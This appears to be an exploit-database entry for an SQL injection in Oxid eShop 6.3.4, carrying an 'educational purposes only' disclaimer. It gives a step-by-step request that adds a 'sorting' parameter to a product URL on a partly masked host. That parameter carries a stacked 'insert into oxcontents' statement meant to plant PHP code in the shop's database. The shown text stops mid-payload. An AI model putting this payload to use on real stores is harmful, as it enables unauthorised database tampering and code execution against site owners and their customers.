Exploits / Vulnerability Discovered : 2020-05-27 |
Type : webapps |
Platform : php
This exploit / vulnerability Oxid eshop 6.3.4 sorting sql injection is for educational purposes only and if it is used you will do on your own risk!
```bash
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html
```
2..Add `sorting` parameter after the URL of item detail ( Insert PHP code
to database via SQL injection )
```bash
e.g. http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert
into
oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)